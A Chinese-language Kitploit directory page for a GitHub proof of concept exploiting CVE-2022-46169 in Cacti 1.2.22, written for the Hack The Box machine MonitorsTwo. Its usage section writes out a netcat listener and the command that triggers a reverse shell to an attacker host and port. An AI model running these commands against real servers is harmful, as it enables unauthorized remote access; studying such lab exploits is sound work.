Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-46169-Exploit — CVE-2022-46169 的漏洞利用,Cacti 1.2.22 中的未认证远程代码执行,向指定主机和端口发送反弹 Shell。 | Kitploit
工具/GitHubGitHub/0xzon/cve-2022-46169-exploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具
GitHub0xzon/cve-2022-46169-exploit

CVE-2022-46169-Exploit

CVE-2022-46169 的漏洞利用,Cacti 1.2.22 中的未认证远程代码执行,向指定主机和端口发送反弹 Shell。

查看仓库
23年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-46169 PoC - Cacti 1.2.22 中的未授权远程代码执行

此仓库包含针对CVE-2022-46169的利用程序,影响Cacti 1.2.22。该漏洞允许未授权的攻击者在受影响系统上执行任意代码。

如果您想详细了解此利用方式,请参考这篇 Rapid7文章。他们对具体细节有深入阐述。

我编写了此代码,并在chatGPT的帮助下,用于一个名为MonitorsTwo的Hack The Box机器,仅供教育目的。

使用说明

root@kitploit:~
Arguments:
	-u URL of Cacti Application
	-lhost IP address of machine you want the shell on
	-lport Port of the machine you want the shell on

在本地机器上用netcat设置监听器 nc -lvnp 9001

针对目标运行利用程序 python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001

免责声明

此概念验证(PoC)仅用于教育和测试目的。在未经系统所有者明确授权的情况下,在任何系统或网络上使用此PoC均属违法行为,并可能导致法律诉讼。创建者不对因正确或错误使用此PoC造成的任何损害承担责任。请自行承担风险。

参考链接

https://chat.openai.com/

https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/

下载工具